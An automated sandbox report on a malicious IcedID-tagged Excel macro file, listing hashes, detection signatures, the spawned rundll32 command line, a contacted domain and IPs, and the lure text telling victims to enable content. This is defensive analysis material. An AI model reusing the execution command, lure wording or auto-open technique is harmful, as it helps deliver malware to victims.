Loading ...

Play interactive tourEdit tour

Analysis Report statistic-2070252624.xlsm

Overview

General Information

Sample Name:statistic-2070252624.xlsm
Analysis ID:403877
MD5:0fbdc8a2acd4dc782821cfa4fdf75099
SHA1:e407df0a3a3ceed4c3e9aed5716974a45cd5c542
SHA256:abd13b66e40db6ad8a4489667c1a1d58fde38e7388970bfbc4d8c7b3fb6cb04e
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: System File Execution Location Anomaly
Yara detected MalDoc1
Allocates a big amount of memory (probably used for heap spraying)
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6868 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 7160 cmdline: rundll32 ..\jordji.nbvt1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5688 cmdline: rundll32 ..\jordji.nbvt11,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6868, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 7160
    Sigma detected: System File Execution Location AnomalyShow sources
    Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6868, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 7160

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: statistic-2070252624.xlsmReversingLabs: Detection: 57%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: unknownHTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.4:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.4:49735 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Source: excel.exeMemory has grown: Private usage: 1MB later: 179MB
    Source: global trafficDNS query: name: industrialarttextile.com
    Source: global trafficTCP traffic: 192.168.2.4:49733 -> 192.254.233.89:443
    Source: global trafficTCP traffic: 192.168.2.4:49733 -> 192.254.233.89:443

    Networking:

    barindex
    Yara detected MalDoc1Show sources
    Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
    Source: Joe Sandbox ViewIP Address: 192.185.5.2 192.185.5.2
    Source: Joe Sandbox ViewIP Address: 192.254.233.89 192.254.233.89
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownDNS traffic detected: queries for: industrialarttextile.com
    Source: jordji.nbvt11.0.drString found in binary or memory: http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.aadrm.com/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.cortana.ai
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.office.net
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.onedrive.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://augloop.office.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://cdn.entity.
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://clients.config.office.net/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://config.edge.skype.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://cortana.ai
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://cortana.ai/api
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://cr.office.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://dev.cortana.ai
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://devnull.onenote.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://directory.services.
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://graph.windows.net
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://graph.windows.net/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://lifecycle.office.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://login.windows.local
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://management.azure.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://management.azure.com/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://messaging.office.com/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://ncus.contentsync.
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://officeapps.live.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://onedrive.live.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://outlook.office.com/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://outlook.office365.com/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://settings.outlook.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://staging.cortana.ai
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://tasks.office.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://wus2.contentsync.
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownHTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.4:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.4:49735 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing from the yellow bar above RunDLL X Once You have Enable Editing ,please clic! f
    Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Cont
    Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above / , WHY I CANNOT OPEN THIS DOCUMENT? W You are using i
    Source: Screenshot number: 12Screenshot OCR: Enable Editing I from the yellow bar above Once You have Enable Editing , please click Enable Co
    Source: Screenshot number: 12Screenshot OCR: Enable Content i from the yellow bar above ' I C' WHY I CANNOT OPEN THIS DOCUMENT? I i I W You
    Source: Document image extraction number: 7Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 7Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 17Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
    Source: Document image extraction number: 17Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: statistic-2070252624.xlsmInitial sample: EXEC
    Source: statistic-2070252624.xlsmInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: statistic-2070252624.xlsmInitial sample: Sheet size: 22188
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="6" rupBuild="9303"/><workbookPr filterPrivacy="1"/><bookViews><workbookView xWindow="8595" yWindow="0" windowWidth="4020" windowHeight="3120"/></bookViews><sheets><sheet name="Sheet1" sheetId="9" r:id="rId1"/><sheet name="Sheet2" sheetId="4" r:id="rId2"/><sheet name="Sheet3" sheetId="7" r:id="rId3"/><sheet name="Sheet4" sheetId="8" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet2!$AO$115</definedName></definedNames><calcPr calcId="145621"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
    Source: classification engineClassification label: mal84.troj.expl.evad.winXLSM@5/14@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{BE9A5C30-A797-41B8-976C-ECAF1DAC178D} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: statistic-2070252624.xlsmReversingLabs: Detection: 57%
